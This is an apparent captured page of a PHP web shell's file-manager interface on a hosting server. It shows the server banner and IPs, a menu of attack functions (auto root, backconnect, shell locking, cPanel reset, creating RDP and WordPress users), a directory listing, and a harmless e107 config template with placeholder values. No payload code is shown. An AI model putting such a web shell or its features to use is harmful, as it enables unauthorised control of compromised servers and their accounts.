Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.28.200
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
e107 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
clone.php
3.15
KB
-rw-r--r--
e107_config.php
1.76
KB
-rw-r--r--
edit.php
4.93
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.89
KB
-rw-r--r--
fileindex.php
595
B
-rw-r--r--
import.php
2.96
KB
-rw-r--r--
info.xml
2.67
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.58
KB
-rw-r--r--
install.xml
1.07
KB
-rw-r--r--
md5
3.99
KB
-rw-r--r--
notes.txt
749
B
-rw-r--r--
update_pass.php
497
B
-rw-r--r--
upgrade.php
16.49
KB
-rw-r--r--
upgrade.xml
271
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : e107_config.php
<?php /* * e107 website system * * Copyright (C) 2008-2023 e107 Inc (e107.org) * Released under the terms and conditions of the * GNU General Public License (http://www.gnu.org/licenses/gpl.txt) * * e107 configuration file * * This file has been generated by the installation script on [[r_date]]. */ $mySQLserver = '[[softdbhost]]'; $mySQLuser = '[[softdbuser]]'; $mySQLpassword = '[[softdbpass]]'; $mySQLdefaultdb = '[[softdb]]'; $mySQLprefix = '[[dbprefix]]'; $mySQLcharset = 'utf8'; $ADMIN_DIRECTORY = 'e107_admin/'; $FILES_DIRECTORY = 'e107_files/'; $IMAGES_DIRECTORY = 'e107_images/'; $THEMES_DIRECTORY = 'e107_themes/'; $PLUGINS_DIRECTORY = 'e107_plugins/'; $HANDLERS_DIRECTORY = 'e107_handlers/'; $LANGUAGES_DIRECTORY = 'e107_languages/'; $HELP_DIRECTORY = 'e107_docs/help/'; $MEDIA_DIRECTORY = 'e107_media/'; $SYSTEM_DIRECTORY = 'e107_system/'; $E107_CONFIG = ['site_path' => '[[site_path]]']; // -- Optional -- // define('e_EMAIL_CRITICAL', '[[admin_email]]'); // email the admin (and share no details with the user) if a critical error occurs. // define('e_LOG_CRITICAL', true); // log critical errors but do not display them to user. (similar to above, but no email is sent - instead error goes into a log file) // define('e_DEBUG', true); // Enable debug mode to allow displaying of errors // define('e_HTTP_STATIC', 'https://static.mydomain.com/'); // Use a static subdomain for js/css/images etc. // define('e_MOD_REWRITE_STATIC', true); // Rewrite static image urls. // define('e_GIT', 'path-to-git'); // Path to GIT for developers // define('X-FRAME-SAMEORIGIN', false); // Option to override X-Frame-Options // define('e_PDO, true); // Enable PDO mode (used in PHP > 7 and when mysql_* methods are not available)
Close